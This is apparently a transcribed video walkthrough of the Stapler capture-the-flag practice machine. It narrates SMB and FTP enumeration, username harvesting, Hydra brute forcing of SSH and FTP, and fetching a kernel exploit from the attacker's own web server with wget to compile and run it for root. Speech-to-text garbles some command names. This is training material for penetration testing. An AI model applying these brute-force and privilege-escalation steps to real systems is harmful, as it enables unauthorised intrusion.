Hello and welcome back. Oh man, I just got 15 minutes into recording this and then I went to pause and it wasn't I had messed something up because I started streaming a couple days ago with this. Anyways, not to start on a downer note here. So this is Stapler from Proving Grounds, originally on vulnhub, and it's a wide open box. I still have my scratch areas here because I'm just too cool for school. Exit out of that. And we're going to start over. So, on Stapler, we have quite a few ports open. This is, like I said, a wide open box. There's lots of ways on there. I'm going to go through the most direct route, try and speed through this. So we're going to see FTP, SSH. We're going to see something on 53, which isn't really usable. We're going to see port 80 for web, 139 for Samba, 666, which is basically just hosting a file. When you netcat to it, it serves you a file. If you decode it, then it gives you a nice little JPEG. We'll see MySQL on 3306 and then HTTPS on port 12380, which is actually hosting WordPress, which is pretty fun. That actually provides a foothold, a very easy foothold method, but not the one we're going to use. So I'm just going to start. We know that 139 is open. When you see 139, you should be thinking two things, at least for this guy. SMB client to look at shares, and then either before or after that, enum for Linux. So I like to start with SMB client just to start to see what we have. lstapler.pg. No password. We see there's print and IPC like normal. And then there's Kathy and temp. So then we can connect to them. SMB client, 4 backslashes. I did try that before. No password, dir. Can we do ls? Yeah, we can because it's Linux. cd Kathy stuff. We have tab completion, you see. And we'll get to the nmap here right as soon as I'm done going through Kathy's. There's that to-do list.txt. Not very interesting. I think I might have that. Cat to do. All that can tell us is maybe there's that username. CD backup. We got those things. The WordPress backup there. It has the whole file system of WordPress. What that'll do is it'll suggest to us that WordPress is there without really looking at anything. Speaking of which, I'm not going to go through it, but we can Deerbuster and GoBuster on 80 at least. 12.380 won't give us too much because HTTPS, but actually I'm just kidding about that. It will, because there's like a robots.txt there, which I didn't even see until it was long since done. Looking back up at nmap, we have 20, which is the data port for FTP. We've got FTP. Anonymous is allowed. Let's just look at that really fast. FTP, Stapler, Anonymous. You see there's that banner there. There's Harry, possibly another username. LS. There's a note. And I'm sure I got that. I'm going to exit out of here. I don't need to. LS. Oh, no. Well, then let's get the note. Super. Cat the note. Ellie, John, leave it in your FTP account. That at least implies that John for sure has an FTP account. But that's really not important. The next thing is enum for Linux. And this is where the actual work is getting done. What this is going to give us is a giant long list of usernames. Which we're then going to cycle through using a Hydra over FTP and SSH. So just very quickly, I have the users. This is the list of users here. We're going to see them come up very quickly. And what I want to demonstrate just very quickly is how we easily get the usernames out of the output of here. So we're just going to hold up. I'll pause. And after a couple minutes, we start seeing these users come out. Let me just copy a few of these. Copy. Just let that go. So what we do, let's do temp, insert, paste. Of course, nothing's on my clipboard. Copy. Insert, paste. So we have all this. And, you know, come to think of it, I could probably just do some sed work from inside of there. But I won't. Cat, temp. And then pipe that to awk. Print value 3. And we're almost there. We'll sed substitute for user. We got to escape that backslash with nothing. And there's our username. So yep. Pipe that to temp user. Boom. So we're left with users.txt. Now we're going to use Hydra using the word list of users.txt and the password list of users.txt. So just using the collection of user ID and password to brute force SSH. And since we're doing that, let's also do FTP because they shouldn't interfere with each other. We're going to find the same result each time. Oh man. Man, that is just all wrong. Gotta love an unshared history. users.txt. Here's cd stapler. Password list users.txt. And this is stapler.pg over SSH, ignoring any file thing. And we see FTP already gave it to us. Spoiler alert, SSH is the exact same thing. So, SSH shazlet at stapler.pg. Yeah, I don't know why that happened. Oh, it's because I'm running Hydra. I am patient enough to wait for Hydra. I'll just keep this ready. So once we get on there we go. I'm just going to stop that. There is no other user ID and password that matches. Here we are. ID, uname A. what this tells us, here's the host name. This is a 32-bit system. No interesting groups. And then, of course, the last kind of rote thing I'm going to show is just, of course, that find perm 4000s to pipe to dev null. There are no interesting set UID binaries or scripts, whatever. So then we look for kernel exploits. There are two good candidates. There's 40049, which is only for 64-bit systems. And there's 39772. And this is the one we want. You see it's for 4.4.x. So anything in there. And this actually isn't really too much of a source. You got to read it. It kind of explains it. So finally, down here is where we get it from. So I'm just going to go full on. That's right, I can't do that. cd git scripts c source and compiled. I've been liking saving my stuff, so unzip. I think that's the only zip. Let me just double check. ls grep zip. Good. Unzip star zip. Let's do that again. Oh, I just have everything already. Make dear. Into 39772. Just to be careful. ls. Let's do this again. Here we go. And then we have crasher.tar and exploit.tar. And we are just interested in the exploit. So we're going to tar, extract verbose file, exploit.tar. Actually, we're not going to worry about that. Python 3, whoops, Python M 3 module server 80. 80 should be fine. wget 2.168.49.102 exploit.tar. Super. Do tar xvf exploit.tar. Super. And what do we have? cd to the directory that's created. We have compile.sh. We got some sources. So let's run the compile. We get some warnings, but we're actually not going to worry about that. The executable we want to use is double put. I didn't try SUID helper. I just went straight for it. Whoops. Double put. And then we wait. It's very communicative. Very nice of it. Oh, that's right. It silently completes. Oh, it must not be done yet. There we go. So now I'm root. cd root ls cat proof. So save that for my records. So while we're here, let's take a look around and ls cd c is https, and there's 2 pages, admin 112233 and blog, which is the WordPress. There's also robots.txt, which shows you those two pages. You look at blog. Yeah, come on. Man, where was the other one? Oh, sample. And the WordPress config.php, that's where this information is. And you can leak this info using a WordPress scan. Like I said, I want to keep this short, so I'm not going to go into that. One day I'll do a complete enumeration of this box. But for these purposes today, at 17 minutes, that is this very quick walkthrough. So thanks for checking this out. I have another one coming up soon.